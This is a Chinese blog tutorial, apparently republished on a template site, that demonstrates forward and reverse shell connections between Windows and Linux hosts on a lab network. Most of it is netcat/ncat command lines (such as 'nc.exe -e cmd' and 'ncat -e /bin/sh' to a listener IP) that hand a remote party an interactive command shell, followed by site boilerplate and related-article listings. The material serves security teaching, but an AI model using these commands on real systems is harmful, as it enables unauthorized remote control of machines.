2023网络安全 -- 正向连接与反向连接

这篇具有很好参考价值的文章主要介绍了2023网络安全 -- 正向连接与反向连接。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、正向连接,Linux服务器主动控制windows服务器

1、上传nc到windows服务器上运行

2、以管理员身份运行cmd

2023网络安全 -- 正向连接与反向连接

3、执行下面命令,监听任意来自8899端口的数据,等待服务器来连接

nc -e cmd -lvvp 8899

2023网络安全 -- 正向连接与反向连接

4、Linux服务器执行如下命令,ip地址为windows服务器的地址

ncat 192.168.1.188 8899

2023网络安全 -- 正向连接与反向连接

5、whoami查看当前主机名称,已获取windows服务器权限

2023网络安全 -- 正向连接与反向连接

6、此时windows服务器也会获取相关信息

2023网络安全 -- 正向连接与反向连接

二、正向连接,windows服务器主动控制Linux服务器

1、Linux服务器运行下面命令绑定端口

ncat -e /bin/sh -lvvp 8899

2023网络安全 -- 正向连接与反向连接

2、windows服务器去连接Linux服务器,

nc 192.168.1.108 8899

3、成功执行Linux相关命令,说明已经可控制Linux服务器

2023网络安全 -- 正向连接与反向连接

三、反向连接,windows服务器控制Linux服务器

1、windows服务器监听8866端口

nc.exe -lvvp 8866

2023网络安全 -- 正向连接与反向连接

2、Linux服务器主动连接windows服务器ip和端口

ncat -e /bin/sh 192.168.1.106 8866

2023网络安全 -- 正向连接与反向连接

3、windows服务器上执行ifconfig命令,成功获取Linux服务器相关信息

2023网络安全 -- 正向连接与反向连接

四、反向连接,Linux服务器控制服务器windows

1、Linux服务器开启端口监听

ncat -lvvp 8899

2023网络安全 -- 正向连接与反向连接

2、windows服务器主动连接Linux服务器

nc.exe -e cmd 192.168.1.108 8899

2023网络安全 -- 正向连接与反向连接

3、Linux服务器直接获取权限

2023网络安全 -- 正向连接与反向连接文章来源地址https://www.toymoban.com/news/detail-502291.html

到了这里,关于2023网络安全 -- 正向连接与反向连接的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【吃透网络安全】2023软考网络管理员考点网络安全(二)网络攻击详解

    黑客的攻击手段介绍,常见的网络攻击,软考网络管理员常考知识点,软考网络管理员网络安全,网络管理员考点汇总。 后面还有更多续篇希望大家能给个赞哈,这边提供个快捷入口! 第一节网络管理员考点网络安全(1)之安全基础 第二节网络管理员考点网络安全(2)之

    2024年02月13日
    浏览(52)
  • 2023年网络安全竞赛——网络安全应急响应Server2228

    网络安全应急响应 任务环境说明: ü 服务器场景:Server2228(开放链接) ü 用户名:root,密码:p@ssw0rd123 1. 找出被黑客修改的系统别名,并将倒数第二个别名作为Flag值提交; 使用用户名和密码登录系统,如下图 在 Linux 中,可以使用 “alias” 命令查看当前系统中定义的所有

    2024年02月10日
    浏览(38)
  • 【吃透网络安全】2023软考网络管理员考点网络安全(三)计算机系统安全评估

    计算机系统安全评估准则,计算机系统安全评估历史,软考网络管理员常考知识点,软考网络管理员网络安全,网络管理员考点汇总。 后面还有更多续篇希望大家能给个赞哈,这边提供个快捷入口! 第一节网络管理员考点网络安全(1)之安全基础 第二节网络管理员考点网络

    2024年02月13日
    浏览(52)
  • 2023网络安全十大顶级工具

    从事网络安全工作,手上自然离不开一些重要的网络安全工具。今天,分享10大网络安全工具。 Kali 是一个基于 Debian 的 Linux 发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这个目标。大多数做安全测试的开源工具都被囊括

    2024年02月04日
    浏览(47)
  • 2023我们如何做好网络安全

    虽然新的一年刚开始, 但是从去年一年的频繁发生的网络攻击事件能看出,今年的网络安全事件也不会少,网络环境是日益严峻。目前用户对安全需求只会越来越多,那么我们该怎么做好网络安全,来预防可能会有的网络攻击情况,保障自身业务的安全运营。 想要有效应对

    2023年04月09日
    浏览(56)
  • 2023 年的 5G 和网络安全风险

      5G 网络的推出出奇地缓慢。作为一个概念,它于 2016 年推出,但直到 2019 年才在全球范围内推出。 四年后,在大多数国家地区,拥有 5G 设备的人数仍然很少。  不确定采用缓慢背后的原因是负担能力、缺乏必要性还是关于它的严重错误信息传播。 然而,可以对 5G 发起的一

    2024年02月11日
    浏览(40)
  • 网络安全在2023好入行吗?

    前言  023年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。 理由很简单,目前来说,信息安全的圈子人少,985、211院校很多都才建立这个专业,加上信息安全法的存在,形成了小圈子的排他

    2024年02月13日
    浏览(43)
  • 2023年网络安全竞赛——网页渗透

    网页渗透 任务环境说明:  服务器场景:Server2120  服务器场景操作系统:未知(封闭靶机)  用户名:未知 密码:未知 访问服务器的网站主页,猜测后台数据库中本网页中应用的库名称长度,将长度作为flag提交; 通过扫描发现靶机开放80端口,直接访问80 尝试输入一个

    2024年02月09日
    浏览(36)
  • 嘶吼安全产业研究院发布《2023网络安全产业图谱》

    最近网络安全周,看到各种宣传,舆论上很热闹,实质上较模糊。研究网络生态多年,聊一下自己对网络安全、信息安全的看法,先从国内聊起,分几期聊。 我平时出去和大家聊互联网,用得最多的题目是《信息革命与网络生态》,最近,也会用《网络安全与信息安全》。前

    2024年02月15日
    浏览(50)
  • 2023秋招,网络安全面试题

     Hello,各位小伙伴,我作为一名网络安全工程师曾经在秋招中斩获🔟+个offer🌼,并在国内知名互联网公司任职过的职场老油条,希望可以将我的面试的网络安全大厂面试题和好运分享给大家~ 转眼2023年秋招已经到了金银🔟的关键阶段,宝子们简历抓紧准备投递起来呀,冲冲

    2024年02月15日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包